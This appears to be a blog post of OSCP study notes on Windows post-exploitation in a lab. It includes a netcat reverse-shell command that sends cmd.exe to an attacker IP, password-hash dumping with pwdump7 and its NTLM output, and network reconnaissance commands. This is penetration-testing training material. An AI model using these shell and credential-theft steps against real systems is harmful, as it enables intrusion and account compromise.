OSCP Security Technology - Windows Post Exploitation

OSCP Security Technology - Windows Post Exploitation

Software stores in folder - C:/Users/IEUser/

image-20211023214343712

Create an account named hackme.

image-20211023214647638

Go back to our Kali Linux
locate fgdump
locate wce

image-20211023215310800

nc -nvlp 4444

image-20211023215635729

Run nccat as administrator on Windows 7.

-nv 192.168.1.22 4444 -e cmd.exe

image-20211023220204737

The connection is established now.

image-20211023220350949

Get passwords using pwdump7.exe.

image-20211023221004381

Save these passwords on Linux.

Administrator:500:NO PASSWORD*********************:FC525C9683E8FE067095BA2DDC971889:::                                            
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::                                                    
IEUser:1000:NO PASSWORD*********************:FC525C9683E8FE067095BA2DDC971889:::                                                  
sshd:1001:NO PASSWORD*********************:NO PASSWORD*********************:::                                                    
sshd_server:1002:NO PASSWORD*********************:8D0A16CFC061C3359DB455D00EC27035:::                                             
hackme:1003:NO PASSWORD*********************:32ED87BDB5FDC5E9CBA88547376818D4::: 

Explore

route  print

image-20211023221705554

arp -a

image-20211023221857696

netstat -ano

image-20211023222326204

dir /A

image-20211023222915833

posted @ 2021-10-23 22:30  晨风_Eric  阅读(59)  评论(0编辑  收藏  举报